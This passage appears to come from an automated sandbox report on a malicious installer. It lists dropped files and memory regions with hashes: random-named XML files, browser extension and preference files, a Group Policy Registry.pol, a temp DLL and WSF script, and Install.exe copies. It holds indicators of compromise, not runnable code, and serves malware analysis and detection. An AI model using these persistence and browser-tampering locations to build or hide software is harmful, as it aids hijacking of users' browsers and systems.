                                                                                                                        a21db0da21b47af629ea86ff21103ab3c35ce0da

                                                                                                                        SHA256

                                                                                                                        394e3e11e191a6cf4d6c74542bd031b9499d588c1464c189bf01f41340085013

                                                                                                                        SHA512

                                                                                                                        ac460af85fb134332985f6d46eb2dbb8d3666da2233145525b6b5c838bb68f613d4390a3133d00739d48673269fa88629e478e5a6c949fefea1d95772e0128ec

                                                                                                                      • C:\Program Files (x86)\QcGCGayyaPLLC\CFRGbkV.xml

                                                                                                                        Filesize

                                                                                                                        2KB

                                                                                                                        MD5

                                                                                                                        0d9a1d1b446519c96d63475c9bacc116

                                                                                                                        SHA1

                                                                                                                        bac505f60882a7570281f5a862be72a58ecc19c5

                                                                                                                        SHA256

                                                                                                                        3d67fa75e63221df0fc57a984b61322045c49090de776e17e688f598aa863217

                                                                                                                        SHA512

                                                                                                                        256520c6b3f66c870801ea0689c9f65bfdf3fd2d67d6bc7f8f930ea29f956a2e9b87c44c4a1c0d6b0b7b405cec0a435a5a7b75fcac715f9dbea9024e57b2f4e0

                                                                                                                      • C:\Program Files (x86)\ipKryXWWU\aTSMSvZ.xml

                                                                                                                        Filesize

                                                                                                                        2KB

                                                                                                                        MD5

                                                                                                                        834068dbafceaecc15032630fe097fb4

                                                                                                                        SHA1

                                                                                                                        8cdde549a78cfa8d9d5c684fb5428b3bae595186

                                                                                                                        SHA256

                                                                                                                        a34cc30e86aaab014264fe6f0d3af6ab9332286bbf514a2086d3622086bb4309

                                                                                                                        SHA512

                                                                                                                        38e70a079d0d5968d1b62cd4f1f25e8310bd123a5fe2ebcbd2e35436c785147c22fc5ad1295394d85459d5e7ffd505cbc51ab8a1cb62636aca3f0e38187005f3

                                                                                                                      • C:\Program Files (x86)\sJWGOJOeniRHVrLuwjR\DLZHbRZ.xml

                                                                                                                        Filesize

                                                                                                                        2KB

                                                                                                                        MD5

                                                                                                                        7bc140c976fd57f728378eb39d418d43

                                                                                                                        SHA1

                                                                                                                        29588f350fa12431b940069ccdb6f815af027ccf

                                                                                                                        SHA256

                                                                                                                        8b33b6c9555300b1ded9bee8e31a935c3d44246f6b312ac88fa829d408e574d5

                                                                                                                        SHA512

                                                                                                                        6fb70ee04b7d8aae927db45064f42476154aa2734bcbbb16e792f4504d74f9d0cd0558208bb98091841fb433966e0f220f5bfe90c9fea8f0f8473cd2941c7e44

                                                                                                                      • C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi

                                                                                                                        Filesize

                                                                                                                        2.3MB

                                                                                                                        MD5

                                                                                                                        0a22c3fd856b878fa51d3c754374494b

                                                                                                                        SHA1

                                                                                                                        26b63a7f30d398e8e1d0d7a74c12b6afdfe8f19e

                                                                                                                        SHA256

                                                                                                                        933df4634ccd2070da607237372b19b1cdabcb242c9eb5d6618cc47ca3ce1704

                                                                                                                        SHA512

                                                                                                                        85a15da96a6f04446e3ca93d3cec56670f76ba6d7418838addbd374a1b9b6c116ac034523bc05db9998870deff7b51963cd7b39a3d73f7147a5e1aa9a4b73131

                                                                                                                      • C:\ProgramData\coeVQdnlUzEFEwVB\rUpmpfD.xml

                                                                                                                        Filesize

                                                                                                                        2KB

                                                                                                                        MD5

                                                                                                                        838bf5462e3a0857409141c3c8322ae6

                                                                                                                        SHA1

                                                                                                                        8d2ae765551b81603877bcbf776186e59b440619

                                                                                                                        SHA256

                                                                                                                        e785c813d67d36ea03f94c1d1db20b6f637b2fe7a1b837ebb72812e2ea89d912

                                                                                                                        SHA512

                                                                                                                        8c62d91815740d27e3a454b38085f1273aa609719bfbbfa6eb085139b530d867fbfd57daa00141c9b74e5398df3ca8a851feb664a6f229813e28682ff3cbfb22

                                                                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\en_GB\messages.json

                                                                                                                        Filesize

                                                                                                                        187B

                                                                                                                        MD5

                                                                                                                        2a1e12a4811892d95962998e184399d8

                                                                                                                        SHA1

                                                                                                                        55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720

                                                                                                                        SHA256

                                                                                                                        32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb

                                                                                                                        SHA512

                                                                                                                        bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

                                                                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\fa\messages.json

                                                                                                                        Filesize

                                                                                                                        136B

                                                                                                                        MD5

                                                                                                                        238d2612f510ea51d0d3eaa09e7136b1

                                                                                                                        SHA1

                                                                                                                        0953540c6c2fd928dd03b38c43f6e8541e1a0328

                                                                                                                        SHA256

                                                                                                                        801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e

                                                                                                                        SHA512

                                                                                                                        2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

                                                                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\pt_BR\messages.json

                                                                                                                        Filesize

                                                                                                                        150B

                                                                                                                        MD5

                                                                                                                        0b1cf3deab325f8987f2ee31c6afc8ea

                                                                                                                        SHA1

                                                                                                                        6a51537cef82143d3d768759b21598542d683904

                                                                                                                        SHA256

                                                                                                                        0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf

                                                                                                                        SHA512

                                                                                                                        5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

                                                                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                                        Filesize

                                                                                                                        10KB

                                                                                                                        MD5

                                                                                                                        2423fdb1b28e2bfcec158625ece76894

                                                                                                                        SHA1

                                                                                                                        e77e1d6d68b1b0514af6f9689549c8919d3b7e3d

                                                                                                                        SHA256

                                                                                                                        83e297f0acd2f24626d5967552fae75926c196c470f7732ed813f09e523e9d7a

                                                                                                                        SHA512

                                                                                                                        38b3d1e9640ae1a7f80ca680c14f530e5956128d3aca34bbc3b47bec3e264d098cb7053f4e10ca512dd0d2e9e53be3a01817e6fea2a5d9c22dd5649928857a16

                                                                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                                                                                                                        Filesize

                                                                                                                        7KB

                                                                                                                        MD5

                                                                                                                        c33e06ee4ed768c800a0c597288cbdc5

                                                                                                                        SHA1

                                                                                                                        ce6fc7bcfd490ca355ea3694ffacd3fff8589392

                                                                                                                        SHA256

                                                                                                                        75d8ca5e31f6f7575ab3613d69f31c03de454e78e588d542d0b5ef932c080927

                                                                                                                        SHA512

                                                                                                                        edd1e49ed3c8b743b5a47686ce394c1401501836d8c573f0686956b6d8bb57760acdf958876664c12d32caec0f1a96e7ee88893f9ee9221ecca8cf0a1524d4df

                                                                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                                                                                                                        Filesize

                                                                                                                        7KB

                                                                                                                        MD5

                                                                                                                        2e1bb427c18288d27a7ee01bfcc1fa4a

                                                                                                                        SHA1

                                                                                                                        b42a439e5d19bea425dc9438d0e4b4b0bdf55cdb

                                                                                                                        SHA256

                                                                                                                        6b6846add55a61c3c63a572f0022fe5b2ac4740793c7878e282e11403fd77148

                                                                                                                        SHA512

                                                                                                                        124754a81ec3d2510c09cdfc1518893ccfef6670f5bb635de8b5106dd9ed3942bc8e023dc1c472859f53389a34aedca4ad1793f842908c6379aea3743789c74c

                                                                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

                                                                                                                        Filesize

                                                                                                                        7KB

                                                                                                                        MD5

                                                                                                                        e0e88b3ebccf0ab58d3945c2e1077e7d

                                                                                                                        SHA1

                                                                                                                        b288036c8d67e9955c621f1a9eaa4a90dc9a3698

                                                                                                                        SHA256

                                                                                                                        d9eb36479e6584d964e7126c4d4a0fe834d520675e8aedf64a2b92835c3e0ecc

                                                                                                                        SHA512

                                                                                                                        bdef17cad80d60f64e81d2f2defaa81ec474b1c36b214fa6f59496b4f5cfd97c87056c93b202d7125198eb0681ab16ee287196b1d0c4ff9dc15b9fbffd2c6044

                                                                                                                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\id09dv1m.default-release\prefs.js

                                                                                                                        Filesize

                                                                                                                        7KB

                                                                                                                        MD5

                                                                                                                        874112b8f561faa56a80194a1928d681

                                                                                                                        SHA1

                                                                                                                        195109afed975111cf6103454f98f5ab0c0ff5b9

                                                                                                                        SHA256

                                                                                                                        5584aa010bb5ae9a893a8c9810f3af2b1b29845ead19da305a7917bcfabc431b

                                                                                                                        SHA512

                                                                                                                        782f908f7c3aed7e9890248658bb8d908796f605e12b6c6056e108f12187fde09cbe162e9417429d332552c5d87012fba0ab511d2677f73d419b87ce4282e3c7

                                                                                                                      • C:\Windows\Temp\EVEUCunQCfdKYNhg\ZcZpiQXO\rFUhVPr.dll

                                                                                                                        Filesize

                                                                                                                        6.5MB

                                                                                                                        MD5

                                                                                                                        e32d9a874692b14c3c4a5c9b9c2e7403

                                                                                                                        SHA1

                                                                                                                        deb9b70fd0e01f960977331cc25b5338bb03afda

                                                                                                                        SHA256

                                                                                                                        4131f361a269ff9b3116d70a9db9d23a6d11c1febd731b939e48c162cb89adc6

                                                                                                                        SHA512

                                                                                                                        22aa43c645f168e1f9a9641a8775be1c76e1ec7f9015c951916d3e9d508efad33b16b48f034068202376fe9e383ae2e5c4cde4dada47dca612a034481d52fc10

                                                                                                                      • C:\Windows\Temp\EVEUCunQCfdKYNhg\vnOTPvlE\VJtZCnUdVvLJZCcy.wsf

                                                                                                                        Filesize

                                                                                                                        9KB

                                                                                                                        MD5

                                                                                                                        f21738f71903e61dbd5dc45d4f528ce6

                                                                                                                        SHA1

                                                                                                                        af99d2f0a65091e33316186575ca7cb89c1bd7e4

                                                                                                                        SHA256

                                                                                                                        e9e7e30881de46c76fb733564578e008d74da6227928a15120a8669c4bb9499b

                                                                                                                        SHA512

                                                                                                                        1446913eb0c9c903454182c1191a2ff294e5809b4bb667966e182011ec09e9bf888ed2590559b5319bd582bef212b6693c41febda524e895a60c2d70dc4b2788

                                                                                                                      • C:\Windows\system32\GroupPolicy\Machine\Registry.pol

                                                                                                                        Filesize

                                                                                                                        5KB

                                                                                                                        MD5

                                                                                                                        3097cb023f37364f0805e87a8bf613cb

                                                                                                                        SHA1

                                                                                                                        36d41a1978b3c1147e06e10a803f5c4c7429f5f8

                                                                                                                        SHA256

                                                                                                                        4ea798eb109015516407009cc5b33a4b5359827f47cdb93b114587df5f95dba9

                                                                                                                        SHA512

                                                                                                                        c253f3217efa0bcab25e254c96cefd2c69a6a55932ef648c9beadd2050fb34f5ea648a5239c686f60a9c7be7ab5353593073dff74f7f4ebd4c33fc96e198b945

                                                                                                                      • \Users\Admin\AppData\Local\Temp\7zSE6A7.tmp\Install.exe

                                                                                                                        Filesize

                                                                                                                        6.5MB

                                                                                                                        MD5

                                                                                                                        0a3c4757e20bb98d73416d7a3e7c5e6c

                                                                                                                        SHA1

                                                                                                                        0a7332203b0e1c5e2439490ae2f7ed5364e49c39

                                                                                                                        SHA256

                                                                                                                        91561d50504f75f310a11966269cdc8ebb4425959aafd24ed5b48fdfd0b8e825

                                                                                                                        SHA512

                                                                                                                        e5a153482a20d6b7bd3158274643be1ac2a472f64ca566224ea94e1c774cbcca8cf0b0ddc7a5de0eed6556489fe944a8100cd756c9895b5accc3a5ed75e93152

                                                                                                                      • \Users\Admin\AppData\Local\Temp\7zSEB49.tmp\Install.exe

                                                                                                                        Filesize

                                                                                                                        6.8MB

                                                                                                                        MD5

                                                                                                                        5b02db30f0b7c50ab96bb2ad8961fe73

                                                                                                                        SHA1

                                                                                                                        7e46aca1633fa91c92cd380a74415a1781a7744f

                                                                                                                        SHA256

                                                                                                                        c3541e85a22c639f32af232d3ad9e20ce37a3d4e98c353c235bf11e01ccbbf9d

                                                                                                                        SHA512

                                                                                                                        0e0f414963de3111a125dc5094cbd43dd7c787c4cb88a7df749b40eb9f41a076037bc9f210cc27339026ebcf64b02acba493a4e91e5af32cf25eb6ffe5da7609

                                                                                                                      • memory/316-22-0x0000000002360000-0x0000000002A3C000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        6.9MB

                                                                                                                      • memory/1484-79-0x000000001B5F0000-0x000000001B8D2000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        2.9MB

                                                                                                                      • memory/1680-53-0x0000000002810000-0x0000000002818000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        32KB

                                                                                                                      • memory/1680-52-0x000000001B610000-0x000000001B8F2000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        2.9MB

                                                                                                                      • memory/2004-68-0x0000000077400000-0x000000007751F000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        1.1MB

                                                                                                                      • memory/2004-69-0x0000000077300000-0x00000000773FA000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        1000KB

                                                                                                                      • memory/2056-355-0x0000000001350000-0x00000000019F1000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        6.6MB

                                                                                                                      • memory/2568-65-0x0000000001E00000-0x0000000001E08000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        32KB

                                                                                                                      • memory/2568-64-0x000000001B780000-0x000000001BA62000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        2.9MB

                                                                                                                      • memory/2624-39-0x0000000000970000-0x000000000104C000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        6.9MB

                                                                                                                      • memory/2624-24-0x0000000001440000-0x0000000001B1C000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        6.9MB

                                                                                                                      • memory/2624-23-0x0000000000970000-0x000000000104C000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        6.9MB

                                                                                                                      • memory/2624-27-0x0000000010000000-0x00000000106A1000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        6.6MB

                                                                                                                      • memory/2940-101-0x00000000019D0000-0x0000000001A55000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        532KB

                                                                                                                      • memory/2940-317-0x0000000002620000-0x00000000026A6000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        536KB

                                                                                                                      • memory/2940-89-0x0000000010000000-0x00000000106A1000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        6.6MB

                                                                                                                      • memory/2940-327-0x0000000002330000-0x0000000002403000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        844KB

                                                                                                                      • memory/2940-134-0x0000000000F30000-0x0000000000F93000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        396KB

                                                                                                                      • memory/2940-87-0x0000000000FA0000-0x000000000167C000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        6.9MB

                                                                                                                      • memory/2940-362-0x0000000000FA0000-0x000000000167C000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        6.9MB

                                                                                                                      • memory/2952-57-0x00000000008C0000-0x0000000000F9C000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        6.9MB

                                                                                                                      • memory/2952-41-0x00000000008C0000-0x0000000000F9C000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        6.9MB

                                                                                                                      • memory/2952-42-0x0000000010000000-0x00000000106A1000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        6.6MB

                                                                                                                      • memory/2952-88-0x00000000008C0000-0x0000000000F9C000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        6.9MB